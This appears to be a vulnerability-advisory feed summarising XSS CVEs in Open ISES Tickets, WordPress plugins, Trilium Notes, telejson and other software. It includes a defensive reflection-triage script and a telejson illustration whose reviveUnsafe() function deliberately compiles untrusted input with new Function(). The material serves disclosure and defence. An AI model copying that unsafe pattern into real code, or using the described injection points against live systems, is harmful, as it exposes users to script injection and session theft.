Reflected cross-site scripting in Open ISES Tickets before v3.44.2 allows injection of arbitrary JavaScript through the frm_add_str POST parameter in ics213.php, which is rendered unsanitized inside an HTML hidden input value attribute. The CVSS 4.0 vector (PR:N/UI:A) indicates no privileges are required on the attacker side, but victim interaction is mandatory - a user must submit or be tricked into triggering the crafted request. This CVE is one of 69 XSS vulnerabilities patched in the v3.44.2 critical security release, signaling systemic input sanitization failures across the codebase. No public exploit code has been identified at time of analysis, and this CVE does not appear in the CISA KEV catalog.

PHP XSS
NVD GitHub
EPSS 0% CVSS 5.1
MEDIUM PATCH This Month

Reflected cross-site scripting in Open ISES Tickets before version 3.44.2 allows injection of arbitrary JavaScript via the unsanitized frm_add_str POST parameter in ics205a.php, which is rendered verbatim inside an HTML form hidden input value attribute in the victim's browser. This CVE is one of 69 XSS vulnerabilities patched in the v3.44.2 release - a 'Critical Security Update' that also addressed 19 SQL injection issues and 5 hardcoded secrets, revealing systemic input handling failures across the codebase. No public exploit identified at time of analysis and no CISA KEV listing; however, the broader security debt in this application makes upgrading urgent beyond this single CVE.

PHP XSS
NVD GitHub
EPSS 0% CVSS 5.1
MEDIUM PATCH This Month

Reflected cross-site scripting in Open ISES Tickets (all versions before 3.44.2) allows injection of arbitrary JavaScript through the frm_add_str POST parameter in ics205.php, which is rendered unsanitized inside an HTML form hidden input value attribute. The attacker must induce an authenticated victim to submit a crafted request (UI:A), limiting opportunistic exploitation but enabling session hijacking, credential theft, or further browser-based attacks against logged-in users. This CVE is one of 69 XSS vulnerabilities patched in v3.44.2, which also addressed 19 SQL injection issues and hardcoded credentials - indicating systemic input-handling deficiencies across the PHP codebase. No public exploit code has been identified at time of analysis, and the vulnerability is not listed in the CISA KEV catalog.

PHP XSS
NVD GitHub VulDB
EPSS 0% CVSS 5.1
MEDIUM PATCH This Month

Reflected cross-site scripting in Open ISES Tickets before version 3.44.2 enables JavaScript injection via the frm_add_str POST parameter in ics202.php, where the unsanitized value is written directly into an HTML form hidden input value attribute. The CVSS 4.0 vector (PR:N/UI:A) indicates no attacker privilege is required, but victim interaction is mandatory - meaning an attacker must deceive a user into submitting a crafted POST request to trigger execution. This CVE is one of 69 XSS vulnerabilities patched in the v3.44.2 release alongside 19 SQL injection flaws and 5 hardcoded secrets, signaling a systemic insecurity posture in the codebase prior to this release. No public exploit identified at time of analysis; no CISA KEV listing.

PHP XSS
NVD GitHub VulDB
EPSS 0% CVSS 5.1
MEDIUM PATCH This Month

Reflected cross-site scripting in Open ISES Tickets (all versions before 3.44.2) exposes the icons/buttons/landb.php endpoint to arbitrary JavaScript injection via unsanitized frm_name and frm_id POST parameters, which are rendered directly into both HTML content and inline JavaScript without encoding or sanitization. An attacker who can socially engineer an authenticated user into triggering a crafted POST request can execute arbitrary JavaScript within that user's browser session, enabling session hijacking, credential theft, or malicious UI manipulation. No public exploit has been identified at time of analysis; a vendor-released patch (v3.44.2) is available and all users are urged to upgrade immediately per the vendor's own release advisory.

PHP XSS
NVD GitHub VulDB
EPSS 0% CVSS 5.1
MEDIUM PATCH This Month

Reflected XSS in Open ISES Tickets before 3.44.2 allows JavaScript injection via unsanitized POST parameters (module_choice, flag, confirmation) in delete_module.php, executing attacker-supplied code in the browser of a victim who interacts with a crafted request. The CVSS 4.0 vector (PR:N/UI:A) indicates the attacker requires no privileges but depends on active victim interaction - consistent with a POST-based reflected XSS delivered via a cross-site auto-submitting form targeting an authenticated session. No public exploit has been identified at time of analysis, and vendor-released patch v3.44.2 is available, a release that simultaneously addressed 88 vulnerabilities including 19 SQL injections and 68 additional XSS issues across the same codebase.

PHP XSS
NVD GitHub
EPSS 0% CVSS 5.1
MEDIUM PATCH This Month

Reflected XSS in Open ISES Tickets before v3.44.2 allows JavaScript injection via six unsanitized POST parameters in db_loader.php (ticketshost, ticketsdb, ticketsuser, ticketspassword, ticketsprefix, db_schema), each reflected verbatim into HTML form input value attributes. An attacker who can deliver a crafted POST request to a victim's browser can execute arbitrary JavaScript in the victim's session context, enabling session hijacking or credential theft. The vendor-confirmed fix (v3.44.2) was released as a critical security update resolving 88 total vulnerabilities; no public exploit or CISA KEV listing is identified at time of analysis.

PHP XSS
NVD GitHub
EPSS 0% CVSS 5.1
MEDIUM PATCH This Month

Reflected XSS in Open ISES Tickets (versions before 3.44.2) allows network-based attackers to inject arbitrary JavaScript through the frm_id POST parameter in circle.php. Because the sink is a POST parameter, the victim must be induced to submit a crafted form (typically an auto-submitting cross-site form) rather than merely follow a link. The injected script executes in the victim's browser context, with low impact to confidentiality and integrity that is confined to that browser session rather than the server. No public exploit code or active exploitation has been identified at time of analysis. VulnCheck reported this as one of 69 XSS vulnerabilities patched in the v3.44.2 security release, which addressed 88 total security issues including SQL injection and hardcoded credentials.

PHP XSS
NVD GitHub VulDB
EPSS 0% CVSS 5.1
MEDIUM PATCH This Month

Reflected XSS in Open ISES Tickets before v3.44.2 enables JavaScript injection through the unsanitized ticket_id POST parameter in add_nm.php, which is embedded without encoding into both an HTML form input value attribute and an inline JavaScript string literal - two distinct injection contexts that need two different encoders. When a victim renders the malicious response, attacker-controlled script executes in their browser with potential to steal session tokens or perform actions under their identity. No public exploit has been identified at time of analysis and the vulnerability is not in CISA KEV, but the v3.44.2 release notes reveal 88 co-patched security defects (including 19 SQL injection issues and hardcoded secrets), meaning any unpatched deployment faces compounded, systemic risk far beyond this single CVE.

PHP XSS
NVD GitHub VulDB
EPSS 0% CVSS 5.1
MEDIUM PATCH This Month

Reflected cross-site scripting in Open ISES Tickets before 3.44.2 allows injection of arbitrary JavaScript via the ticket_id POST parameter in add.php, which is echoed unsanitized into an HTML form input value attribute. The CVSS 4.0 vector scores this at 5.1 with no privileges required and active user interaction needed, though the CVE description characterizes attackers as authenticated - a discrepancy discussed in the risk section. No public exploit code or CISA KEV listing exists at time of analysis. This vulnerability is one of 69 XSS issues patched in a single v3.44.2 release that also addressed 19 SQL injection flaws and 5 hardcoded secrets, suggesting systemic insecure coding practices across the codebase.

PHP XSS
NVD GitHub VulDB
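The entries above describe the same defect landing in different output contexts: a form action URL, a hidden input's value attribute, an inline JavaScript string literal, a bare JavaScript expression. When a release fixes 69 such sites at once, the first triage question for each reflected parameter is where in the response it lands, because the landing context decides which encoder would have been correct. The following is an added example written for this page, not code from Open ISES Tickets or any other project listed here: it takes the parameter values a request carried and the response body, finds verbatim reflections, and classifies each one. The parameter names are taken from the entries above; the canary values and the response markup are constructed for the example.

```javascript
// Added example, not code from Open ISES Tickets or any other project on this page.
// Triage helper for reflected parameters: given the values a request carried and the
// response body, find each verbatim reflection and classify the output context it landed
// in, because the context decides which encoder would have been correct.

// Count quote characters, skipping backslash-escaped ones (JavaScript string rules).
function countUnescaped(s, ch) {
  let n = 0;
  for (let i = 0; i < s.length; i++) {
    if (s[i] === '\\') { i++; continue; }
    if (s[i] === ch) n++;
  }
  return n;
}

// Heuristic context classification at `offset`: enough for triage, not a full HTML parser.
function classifyContext(body, offset) {
  const before = body.slice(0, offset);
  const scriptOpen = before.lastIndexOf('<script');
  if (scriptOpen > before.lastIndexOf('</script')) {
    const js = before.slice(before.indexOf('>', scriptOpen) + 1);   // code since the opening tag
    for (const q of ["'", '"', '`']) {
      if (countUnescaped(js, q) % 2 === 1) return { context: 'js-string', quote: q };
    }
    return { context: 'js-code' };
  }
  const lt = before.lastIndexOf('<');
  if (lt > before.lastIndexOf('>')) {                                // inside a tag
    const m = before.slice(lt).match(/([a-zA-Z-]+)\s*=\s*(["']?)[^"']*$/);
    if (m) return { context: 'attribute-value', attribute: m[1].toLowerCase(), quote: m[2] };
    return { context: 'tag' };
  }
  return { context: 'html-text' };
}

// Every verbatim occurrence of every parameter value, with its context.
function findReflections(params, body) {
  const findings = [];
  for (const [param, value] of Object.entries(params)) {
    for (let at = body.indexOf(value); at !== -1; at = body.indexOf(value, at + value.length)) {
      findings.push({ param, offset: at, ...classifyContext(body, at) });
    }
  }
  return findings;
}

// What a fix would have to apply at that sink.
const URL_ATTRIBUTES = new Set(['href', 'src', 'action', 'formaction']);
function requiredEncoder(finding) {
  switch (finding.context) {
    case 'html-text':
      return 'html-entity';
    case 'attribute-value':
      if (finding.quote === '') return 'quote the attribute, then html-attribute';
      return URL_ATTRIBUTES.has(finding.attribute) ? 'html-attribute + url-scheme-allowlist' : 'html-attribute';
    case 'js-string':
      return 'js-string-literal (JSON-style, escape </)';
    default:
      return 'no encoder is safe here: move the value out of code';
  }
}

// Constructed sample: alphanumeric canaries (so quote counting is not disturbed) and a
// response body shaped like the sinks the entries describe. Parameter names are the
// page's; the markup is invented for the example.
const PARAMS = { id: 'zqid7', ticket_id: 'zqticket7', the_ticket: 'zqthe7', thelat: 'zqlat7', frm_query: 'zqquery7' };
const BODY = [
  '<form action="patient.php?id=zqid7&ticket_id=zqticket7">',
  '<input type="hidden" name="ticket_id" value="zqticket7">',
  "<input name=\"frm_query\" VALUE='zqquery7'>",
  '</form>',
  "<script>var the_ticket = 'zqthe7'; var thelat = zqlat7;</script>",
  '<p>Query: zqquery7</p>',
].join('\n');

for (const f of findReflections(PARAMS, BODY)) {
  console.log(f.param, f.context, f.attribute || '', JSON.stringify(f.quote || ''), '->', requiredEncoder(f));
}
```

The canaries are deliberately plain so a single request maps every sink; a second request with the characters the classifier names (a double quote for the attribute, a single quote for the string literal, nothing at all for the bare expression) confirms whether the server encodes them. A value reflected as a bare JavaScript expression, as thelat and thelng are in street_view.php, has no safe encoder at all; the fix there is to emit the value as a JSON literal or move it into a data attribute.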
EPSS 0% CVSS 5.1
MEDIUM PATCH This Month

Request Tracker is vulnerable to a reflected cross-site scripting (XSS) vulnerability via the "Page" parameter in GET requests. An attacker can craft a URL that, when opened, results in arbitrary JavaScript execution in the victim’s browser. This vulnerability affects versions from 5.0.4 up to 5.0.9 and from 6.0.0 up to 6.0.2.

XSS
NVD
EPSS 0% CVSS 6.4
MEDIUM This Month

Stored Cross-Site Scripting in Avada (Fusion) Builder for WordPress (all versions through 3.15.2) allows authenticated attackers with Subscriber-level access to persist malicious JavaScript via unsanitized shortcode parameters. The injected scripts execute in the browser of any user - typically an administrator - who views a page rendering dynamic user data such as biographical information sourced through the plugin's Dynamic Data feature. Because the CVSS scope is Changed (S:C), the impact falls on a component other than the vulnerable one - the viewing user's browser session rather than the plugin - enabling session hijacking or privilege escalation against higher-privileged users. No public exploit code or CISA KEV listing has been identified at time of analysis.

WordPress XSS
NVD VulDB
EPSS 0% CVSS 4.9
MEDIUM This Month

Stored Cross-Site Scripting in the WPB Floating Menu & Categories WordPress plugin (all versions through 1.0.8) permits authenticated attackers holding Editor-level privileges or higher to inject arbitrary JavaScript via the 'Icon CSS Class' category field. The injected payload persists in the database and executes in the browser of any site visitor who loads a page containing the affected floating menu component, enabling session hijacking or credential harvesting against arbitrary users including administrators. No public exploit has been identified at time of analysis, and the plugin is not listed in the CISA KEV catalog; the CVSS 4.9 Medium score reflects the significant mitigation provided by the high-privilege prerequisite.

WordPress XSS
NVD VulDB
EPSS 0% CVSS 8.4
HIGH This Week

Stored cross-site scripting in the Taiko AG1000-01A SMS Alert Gateway (Rev 7.3 and Rev 8) lets authenticated low-privilege users plant persistent JavaScript in the device's web configuration interface by splitting payloads across multiple admin form fields. The injected script executes in any administrator session that views dashboard pages such as index.zhtml, enabling session hijack or privilege escalation within the appliance. No public exploit identified at time of analysis, and the issue is not listed in CISA KEV.

XSS
NVD VulDB
EPSS 0% CVSS 5.1
MEDIUM PATCH This Month

Reflected cross-site scripting in Open ISES Tickets before v3.44.2 allows attackers to inject arbitrary JavaScript into victim browsers via the unsanitized `frm_query` POST parameter in `search.php`, which is echoed verbatim into an HTML input `VALUE` attribute. The CVSS 4.0 score of 5.1 (Medium) reflects a required active user interaction step (UI:A) that limits opportunistic exploitation - a victim must be induced to submit a crafted request. No public exploit code has been identified at time of analysis and the vulnerability is not listed in CISA KEV; however, a vendor-released patch (v3.44.2) is available and should be applied immediately, as it simultaneously addresses 88 security vulnerabilities - including 68 additional XSS flaws across 22 files - indicating systemic insecurity in all prior versions.

PHP XSS
NVD GitHub VulDB
EPSS 0% CVSS 5.1
MEDIUM PATCH This Month

Reflected XSS in Open ISES Tickets before 3.44.2 enables injection of arbitrary JavaScript via the unsanitized `the_ticket` GET parameter in do_unit_mail.php, which is written directly into a JavaScript variable assignment without output encoding. An attacker who can deliver a crafted URL to a user of the application can execute arbitrary JavaScript in that user's browser session, enabling session hijacking, credential theft, or UI redirection. No active exploitation is confirmed (not in CISA KEV) and no public POC is identified at time of analysis; the patch commit and vendor release are public, however, which lets an attacker locate the vulnerable code path by diffing, so unpatched deployments should be treated as exposed.

PHP XSS
NVD GitHub
EPSS 0% CVSS 5.1
MEDIUM PATCH This Month

Reflected cross-site scripting in Open ISES Tickets before 3.44.2 allows injection of arbitrary JavaScript via the ticket_id GET parameter in routes_nm.php, which is unsanitized and written directly into an HTML hidden input field VALUE attribute. The CVSS 4.0 vector (PR:N) indicates no privileges are required, but the CVE description explicitly characterizes the attacker as authenticated - this discrepancy must be verified with the vendor before determining actual exploitation prerequisites. Active user interaction is required (UI:A), meaning exploitation depends on a victim clicking a crafted URL. No public exploit has been identified at time of analysis and this CVE is not listed in the CISA KEV catalog.

PHP XSS
NVD GitHub
EPSS 0% CVSS 5.1
MEDIUM PATCH This Month

Reflected XSS in Open ISES Tickets before version 3.44.2 allows an attacker to inject arbitrary JavaScript into a victim's browser session via the thelat and thelng GET parameters in street_view.php, where values are passed unsanitized directly into JavaScript variable assignments. The attack requires user interaction - a victim must visit a crafted URL - and the CVSS 4.0 score of 5.1 reflects low impact on the subsequent system, the victim's browser session, rather than on the server (SC:L/SI:L). Notably, this CVE is one of 69 XSS vulnerabilities patched in the v3.44.2 release, which also addressed 19 SQL injection flaws and 5 hardcoded secrets, indicating severe systemic security debt in the codebase. No public exploit identified at time of analysis, and no CISA KEV listing.

PHP XSS
NVD GitHub
EPSS 0% CVSS 5.1
MEDIUM PATCH This Month

Reflected XSS in Open ISES Tickets before version 3.44.2 enables JavaScript injection via the ticket_id GET parameter in add_facnote.php, which is written unsanitized into a hidden HTML input field's VALUE attribute. An attacker can craft a URL containing a JavaScript payload and trick a user into visiting it, causing script execution in the victim's browser session within the application's origin. No public exploit has been identified at time of analysis, and a vendor-released patch is confirmed at v3.44.2. Notably, this CVE is one of at least 69 XSS vulnerabilities addressed in the same release, indicating systemic input sanitization failures across the codebase.

PHP XSS
NVD GitHub
EPSS 0% CVSS 5.1
MEDIUM PATCH This Month

Reflected cross-site scripting in Open ISES Tickets before v3.44.2 allows attackers to execute arbitrary JavaScript in a victim's browser by delivering a crafted URL containing a payload in the `frm_call` GET parameter of `opena.php`, which is reflected directly into page output without sanitization. The CVSS 4.0 vector scores this at 5.1 (Medium), with impact limited to the subsequent browser context (SC:L/SI:L) rather than the server itself. No public exploit has been identified at time of analysis, and this CVE is not listed in CISA KEV - however, the v3.44.2 release patched 88 total vulnerabilities including 19 SQL injection flaws, indicating systemic security debt warranting urgent upgrade regardless of this CVE's moderate score.

PHP XSS
NVD GitHub
EPSS 0% CVSS 5.1
MEDIUM PATCH This Month

Reflected XSS in Open ISES Tickets before 3.44.2 enables JavaScript injection via the ticket_id GET parameter in patient_JF.php, where the unsanitized value is written directly into a JavaScript variable assignment in the server response. The CVSS 4.0 vector (PR:N, UI:A) indicates no authentication is required from the attacker's side, though the CVE description contradicts this by specifying 'authenticated attackers' - this conflict should be verified with the vendor. Exploitation requires the victim to actively visit a crafted URL, limiting mass exploitation, but the broader v3.44.2 release context - which patches 88 total vulnerabilities including 19 SQL injection flaws - signals systemic input validation failures across the codebase. No public exploit code or CISA KEV listing has been identified at time of analysis.

PHP XSS
NVD GitHub
EPSS 0% CVSS 5.1
MEDIUM PATCH This Month

Reflected XSS in Open ISES Tickets before 3.44.2 allows injection of arbitrary JavaScript via the unsanitized ticket_id GET parameter in add_note.php, with payload execution occurring in the browser of any authenticated user who visits a crafted URL. The CVSS 4.0 score of 5.1 (Medium) reflects the mandatory user interaction requirement and impact scope limited to the browser context, with no server-side confidentiality or integrity impact. No public exploit code or active exploitation has been identified at time of analysis; the vendor released v3.44.2 as a critical security update that addresses this issue alongside 87 additional vulnerabilities.

PHP XSS
NVD GitHub
EPSS 0% CVSS 5.1
MEDIUM PATCH This Month

Reflected cross-site scripting in Open ISES Tickets before version 3.44.2 allows an attacker to inject arbitrary JavaScript via the ticket_id GET parameter in single.php, which is rendered unsanitized into an HTML attribute and executed in a victim's browser upon visiting a crafted URL. This vulnerability is one of 69 XSS issues patched in the v3.44.2 release, which also addressed 19 SQL injection flaws and hardcoded credentials - signaling systemic input handling deficiencies across the application. No public exploit code or CISA KEV listing has been identified at time of analysis, but the CVSS 4.0 score of 5.1 and mandatory user interaction (UI:A) limit automated exploitation.

PHP XSS
NVD GitHub
EPSS 0% CVSS 5.1
MEDIUM PATCH This Month

Reflected XSS in Open ISES Tickets before version 3.44.2 allows attackers to inject arbitrary JavaScript into a victim's browser session via the unsanitized 'id' GET parameter in single_unit.php. The injected value is written directly into an HTML attribute without escaping, enabling session hijacking, credential theft, or malicious redirects when a victim visits an attacker-crafted URL. This CVE is one of 69 XSS vulnerabilities patched in the v3.44.2 security release - indicating systemic input validation failures across the application. No public exploit or CISA KEV listing has been identified at time of analysis.

PHP XSS
NVD GitHub
EPSS 0% CVSS 6.8
MEDIUM PATCH This Month

Stored XSS-to-RCE chain in Trilium Notes versions 0.102.1 and prior allows a network attacker to execute arbitrary Node.js code on the server by tricking an authenticated user into viewing a malicious SVG attachment. The chain rests on three compounding design flaws - unsanitized SVG attachments served with the image/svg+xml MIME type (a browser that opens one directly runs any script it embeds in the application's origin), a deliberately disabled Content Security Policy, and a script-execution endpoint at /api/script/exec that same-origin script can call with no authorization step beyond the victim's existing session - enabling full server compromise through a single user interaction. No public exploit code or CISA KEV listing has been identified at time of analysis, but the detailed disclosure in the GitHub security advisory provides a near-complete attack recipe; EPSS data was not available at time of analysis.

XSS RCE Node.js
NVD GitHub
EPSS 0% CVSS 2.1
LOW PATCH Monitor

DOM-based cross-site scripting in telejson versions prior to 6.0.0 allows unauthenticated remote attackers to execute arbitrary JavaScript by supplying a crafted JSON payload to the parse() function, specifically via a malicious _constructor-name_ property that is injected unsanitized into a new Function() call during prototype reconstruction. All applications using telejson < 6.0.0 that pass externally-sourced JSON - particularly those using postMessage for cross-frame communication - to telejson.parse() are affected. No public exploit has been identified at time of analysis, though the GHSA advisory (GHSA-ccgf-5rwj-j3hv) publishes both vulnerable and patched source code at named release tags, substantially lowering the barrier to exploitation. Vendor-released patch is available as telejson 6.0.0.

XSS
NVD GitHub
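The telejson entry above describes a deserializer that rebuilds class instances from a `_constructor-name_` field and obtains the constructor by compiling the name with `new Function()`. The following is an added illustration written for this page, not telejson's code: it shows that pattern in its smallest form beside an allowlist-based alternative. The payloads, the `revivedCodeRan` marker on `globalThis`, and the factory table are constructed for the example.

```javascript
// Added example, not telejson's code: the shape of the bug the entry above describes, beside a
// safe alternative. A deserializer that restores class instances from a "_constructor-name_"
// field must never obtain that constructor by compiling the untrusted name into code.

// Constructed sample payloads. The malicious "name" is an expression with a side effect;
// anything that compiles it will run the assignment.
const MALICIOUS = JSON.stringify({ '_constructor-name_': '(globalThis.revivedCodeRan = true, Object)', value: 42 });
const BENIGN = JSON.stringify({ '_constructor-name_': 'Date', value: 0 });

function wasCodeExecuted() { return globalThis.revivedCodeRan === true; }
function resetMarker() { delete globalThis.revivedCodeRan; }

// Vulnerable pattern: Function() turns the constructor name into executable JavaScript.
function reviveUnsafe(json) {
  const obj = JSON.parse(json);
  const ctor = new Function('return ' + obj['_constructor-name_'])();   // attacker expression runs here
  return new ctor(obj.value);
}

// Safe pattern: a fixed allowlist of names mapped to factories. A Map rather than an object
// literal, so names like "__proto__" or "constructor" cannot reach inherited properties;
// anything not on the list is refused instead of being looked up on globalThis.
const ALLOWED = new Map([
  ['Date', (o) => new Date(o.value)],
  ['RegExp', (o) => new RegExp(o.source, o.flags)],
  ['Set', (o) => new Set(o.value)],
]);
function reviveSafe(json) {
  const obj = JSON.parse(json);
  const name = obj['_constructor-name_'];
  if (typeof name !== 'string' || !ALLOWED.has(name)) {
    throw new TypeError(`refusing to revive unknown constructor ${JSON.stringify(name)}`);
  }
  return ALLOWED.get(name)(obj);
}

console.log(reviveSafe(BENIGN).toISOString());         // 1970-01-01T00:00:00.000Z
try { reviveSafe(MALICIOUS); } catch (e) { console.log(e.message); }
console.log(wasCodeExecuted());                         // false: the name was never compiled
reviveUnsafe(MALICIOUS);
console.log(wasCodeExecuted());                         // true: deserialization ran attacker code
```

The entry's warning about postMessage follows directly: a frame that passes a received message into such a parser hands the sender the same Function() call, so the allowlist check has to live in the parser, not in whichever caller remembered to validate the origin.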
EPSS 0% CVSS 7.2
HIGH This Week

Stored cross-site scripting in the Cost of Goods by PixelYourSite WordPress plugin (versions ≤1.2.12) allows remote unauthenticated attackers to inject persistent JavaScript via the 'csvdata[0][cost_of_goods_value]' parameter. Injected payloads execute in the browser of any user (including administrators) who later views the affected page, enabling session hijacking and admin takeover. No public exploit identified at time of analysis and the issue is not listed in CISA KEV.

WordPress XSS
NVD
EPSS 0% CVSS 5.3
MEDIUM This Month

Cross-site scripting in Kieback & Peter DDC building automation controllers allows a network-accessible attacker to inject and execute arbitrary JavaScript within a victim's browser session when interacting with the device's web interface. Affected models span the full DDC4000 product line - DDC4002, DDC4100, DDC4200, DDC4200-L, DDC4400, and their 'E' variants (DDC4002E, DDC4020E, DDC4040E, DDC4200E, DDC4400E) - representing widely deployed OT/ICS building management infrastructure. No public exploit code has been identified at time of analysis, and this CVE is not listed in the CISA KEV catalog; however, the ICS context elevates concern given the physical-world impact of compromised building controllers.

XSS
NVD GitHub
EPSS 0% CVSS 7.6
HIGH This Week

Reflected cross-site scripting in Beyaz Computer Software's CityPLus application (versions before V24.29750.1.0) allows remote attackers to inject malicious script into web responses that execute in a victim's browser after the victim clicks a crafted link. The CVSS 7.6 score is elevated by a High Availability impact, suggesting the XSS payload can crash or render the application unusable beyond typical session-theft outcomes. No public exploit identified at time of analysis and the issue was reported by TR-CERT (Turkey's national CERT).

XSS
NVD
EPSS 0% CVSS 6.5
MEDIUM PATCH This Month

Stored XSS in the Themeisle Visualizer WordPress plugin (all versions before 4.0.0) allows an authenticated low-privileged user to inject persistent malicious scripts into chart or visualization content. When a victim user subsequently views the affected page, the injected script executes in their browser within a changed scope (S:C), meaning impact extends beyond the attacker's own session to other users. No public exploit code or active exploitation (CISA KEV) has been identified at time of analysis, but the low attack complexity and network-accessible vector make this straightforward to abuse on sites with open or loosely controlled contributor registration.

XSS
NVD
EPSS 0% CVSS 4.3
MEDIUM This Month

Stored Cross-Site Scripting via CSRF in the Anomify AI WordPress plugin (versions ≤ 0.3.6) allows unauthenticated remote attackers to inject persistent JavaScript into the WordPress admin panel by tricking a logged-in administrator into visiting an attacker-controlled page. The attack chains two flaws: a missing nonce check on the settings handler (no check_admin_referer()), which lets any cross-origin POST modify plugin settings, and an output-encoding gap on the API key value - it is passed through sanitize_text_field() before storage, which strips tags but leaves double quotes intact, and is later echoed into an HTML attribute via bare echo without esc_attr(), so a value containing a double quote survives sanitization and storage and then closes the attribute on output. No public exploit has been identified at time of analysis, and the CVE is not listed in the CISA KEV catalog.

PHP WordPress XSS +1
NVD VulDB
EPSS 0% CVSS 6.1
MEDIUM POC PATCH This Month

Stored XSS in the Email Encoder WordPress plugin (all versions before 2.4.7) permits unauthenticated remote attackers to inject persistent malicious scripts by supplying unsanitized email addresses through public-facing input fields. The CVSS scope is Changed (S:C) because the injected payload executes in visitors' browsers rather than in the server context, enabling session hijacking, credential theft, or malicious redirects against any visitor who loads an affected page. A publicly available proof-of-concept exists per WPScan reporting; no active exploitation has been identified at time of analysis and the issue is not listed in CISA KEV.

WordPress XSS
NVD WPScan VulDB
EPSS 0% CVSS 6.4
MEDIUM This Month

Stored Cross-Site Scripting in the AI Chatbot & Workflow Automation by AIWU WordPress plugin (versions ≤1.4.14) allows injection of arbitrary web scripts via the unsanitized X-Forwarded-For HTTP request header. The injected payload persists server-side and executes in the browser of any user who accesses an affected page, enabling session hijacking, credential theft, or malicious redirects. No public exploit has been identified at time of analysis, and no CISA KEV listing exists, though practical exploitation is further constrained by a 20-character storage limit on the injected value.

WordPress XSS
NVD VulDB
EPSS 0% CVSS 5.4
MEDIUM This Month

Stored cross-site scripting in Qlik Talend Administration Center allows an authenticated user holding server management permissions to inject persistent malicious script payloads that execute in the browsers of other TAC users who subsequently view the affected content. The CVSS Changed scope (S:C) signals that successful exploitation crosses security boundaries beyond the application itself, enabling impact on victim browser sessions. No public exploit code identified at time of analysis, no CISA KEV listing, but Qlik has published a security fix via their official support community.

XSS
NVD VulDB
EPSS 0% CVSS 7.4
HIGH This Week

Stored cross-site scripting in the mailcow-dockerized administrator Queue Manager allows attackers who can influence Postfix queue metadata to inject HTML/JavaScript that executes in an authenticated administrator's browser. The flaw exists because the /api/v1/get/mailq/all endpoint feeds server-controlled queue fields into DataTables rows that are rendered as HTML without sufficient output encoding. No public exploit identified at time of analysis, and the issue is not listed in CISA KEV.

XSS
NVD GitHub
EPSS 0% CVSS 6.4
MEDIUM This Month

Stored Cross-Site Scripting in the Logo Manager For Enamad WordPress plugin (versions up to and including 0.7.4) allows authenticated attackers with contributor-level access to inject persistent malicious scripts via the 'title' attribute of three shortcodes - vc_enamad_namad, vc_enamad_shamed, and vc_enamad_custom. The injected payload executes in the browser of any user who subsequently visits the compromised page, enabling session hijacking, credential theft, or malicious redirects against site visitors and administrators. No public exploit code or active exploitation has been identified at time of analysis; however, the low privilege requirement (contributor) broadens the realistic attacker pool on multi-author WordPress sites.

WordPress XSS
NVD
EPSS 0% CVSS 6.4
MEDIUM This Month

Stored Cross-Site Scripting in the Faces of Users WordPress plugin (all versions through 0.0.3) allows authenticated attackers with Contributor-level access or above to inject persistent malicious JavaScript via the 'default' attribute of the 'facesofusers' shortcode. Once injected, the payload executes silently in the browser of any user who visits the compromised page, enabling session theft, credential harvesting, or malicious redirects targeting higher-privileged users including administrators. No public exploit code has been identified at time of analysis, and this CVE does not appear in the CISA KEV catalog.

WordPress XSS
NVD
EPSS 0% CVSS 6.1
MEDIUM This Month

Cross-Site Request Forgery chained to Stored Cross-Site Scripting in the Word 2 Cash WordPress plugin (versions ≤ 0.9.2) allows unauthenticated remote attackers to plant persistent JavaScript payloads inside the WordPress admin panel. The attack succeeds because the plugin's settings handler (w2c_admin()) performs no nonce verification, no input sanitization before storage, and no output escaping on retrieval - meaning a forged POST from any attacker-controlled page is indistinguishable from a legitimate admin save. No public exploit or CISA KEV listing has been identified at time of analysis, but the CVSS score of 6.1 with Changed scope reflects real post-exploitation reach within the admin context once triggered.

WordPress XSS CSRF
NVD VulDB
EPSS 0% CVSS 4.4
MEDIUM This Month

Stored Cross-Site Scripting in the General Options WordPress plugin (versions up to and including 1.1.0) allows authenticated attackers holding Administrator-level privileges to persist malicious JavaScript in the Contact Number settings field, which executes in the browser of any administrator who subsequently visits the plugin's settings page. The flaw is rooted in the misapplication of sanitize_text_field() for output escaping - a function that strips HTML tags but does not encode double-quote characters, enabling attribute context breakout when the stored value is echoed inside a double-quoted HTML attribute. WordPress's wp_magic_quotes backslash-prefixing mechanism provides no protection here because HTML parsers treat the backslash as a literal character rather than an escape sequence. No active exploitation has been confirmed (not in CISA KEV), and no public exploit code has been identified at time of analysis.

WordPress XSS
NVD VulDB
EPSS 0% CVSS 6.4
MEDIUM This Month

Stored Cross-Site Scripting in the Diagnosis Generator (診断ジェネレータ作成プラグイン) WordPress plugin allows any subscriber-level authenticated user to write arbitrary JavaScript into WordPress theme files by exploiting a missing capability check in themeFunc(). The payload persists in theme files and executes in every site visitor's browser upon loading any page containing the diagnosis form shortcode, giving a single low-privilege attacker persistent, cross-user script execution. No public exploit has been identified at time of analysis, but the subscriber-level access requirement makes this a broad risk on any WordPress site with open user registration.

WordPress XSS
NVD
EPSS 0% CVSS 6.1
MEDIUM This Month

Reflected Cross-Site Scripting in the VatanSMS WP SMS WordPress plugin (all versions through 1.01) allows unauthenticated remote attackers to inject arbitrary JavaScript via the unsanitized `page` parameter, executing in the context of a logged-in administrator's browser session. Exploitation requires social engineering an administrator into clicking a crafted link, making this a medium-severity but realistic threat vector for WordPress site takeover or credential theft. No public exploit code has been identified at time of analysis, and this vulnerability is not listed in the CISA KEV catalog.

WordPress XSS
NVD
EPSS 0% CVSS 6.1
MEDIUM This Month

Reflected Cross-Site Scripting in the SponsorMe plugin for WordPress (all versions through 0.5.2) allows unauthenticated attackers to execute arbitrary JavaScript in a victim's browser by tricking an authenticated user - likely a WordPress administrator - into clicking a specially crafted wp-admin/admin.php URL. The value of $_SERVER['PHP_SELF'] is reflected unsanitized in two distinct locations within the same vulnerable function: a form action attribute (sponsorme.php:440) and an anchor href attribute (sponsorme.php:475), doubling the attack surface. No patch has been identified at the time of analysis, and no public exploit or CISA KEV listing has been confirmed.

PHP WordPress XSS
NVD
EPSS 0% CVSS 6.1
MEDIUM This Month

Reflected Cross-Site Scripting in the Correct Prices WordPress plugin (versions up to and including 1.0) exposes any site running this plugin to script injection via crafted URLs. The correct_prices_page() function writes the raw value of $_SERVER['PHP_SELF'] into a form's action attribute without calling esc_url() or esc_attr(), allowing an attacker to break out of the HTML attribute context and inject arbitrary markup. CVSS vector PR:N confirms no authentication is required from the attacker, though exploitation is limited by a required user interaction (UI:R) - a victim must be tricked into following a specially crafted link. No active exploitation has been confirmed (not in CISA KEV) and no public exploit code was identified at time of analysis.

WordPress XSS
NVD
EPSS 0% CVSS 4.4
MEDIUM This Month

